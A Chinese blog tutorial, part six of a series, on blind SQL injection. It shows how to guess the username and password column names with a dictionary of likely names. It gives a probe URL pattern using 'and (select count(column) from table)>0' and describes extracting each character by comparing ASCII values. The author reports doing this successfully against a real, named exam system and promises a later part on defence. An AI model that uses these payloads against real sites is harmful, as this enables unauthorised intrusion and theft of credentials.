SQL注入——网络安全问题不容忽视!(六)
接着上一节。这一节其实内容和上一节差不多。主要是加了字典攻击。
?
?
为什么这一节要提到字典攻击呢?这是有原因的。我们从系统表里面获得用户表的表名是毫无问题的。
?
因为系统表的每个列名都是可以看得到的。而我们得到一个用户表的用户名的列名个密码的列名是有难度的。因为我们不知道人家写的是什么名字。
但我们可以根据字典攻击来判断。
?
我们先来大概看一下用户名的列名大概有哪些可能
?
username
user
name
u_name
administrators
userid
adminuser
adminpass
adminname
user_name
admin_name
usr_n
usr
dw
nc
uid
admin
admin_user
admin_username
user_admin
adminusername
pwd
id
userid
bbsuser
bbsid
bbsuserid
bbsusername
?
?
我们就可以一个个去试探了。所以字典攻击充满着不肯定的因素。可能成功。也可能不会成功。
?
?
?
假设已经找到的了用户名列名是username? 和? 密码用pwd
?
?
中南党校考试系统的用户名和密码的列名就是上面这两个。我试了不到十次就成功了。
?
http://xxxxx ? id=41 and (select?count(列名)? from 已经攻下的表名)>0
?
我们只需要将列名逐次替换掉就好了。然后如果返回的页面和id=41的是一样的话。那么这个列名就是对滴。
?
?
?然后操作就和前两讲一模一样了。通过ascii值来判断每个字符是什么。然后就获得了。
?
?
?
?
额外话:
?
攻击就算是完了。这里只是一个简单的引子。接下来会讲到防御。
?
敬请期待!
?
?
?
?
?
?
?
?
?
?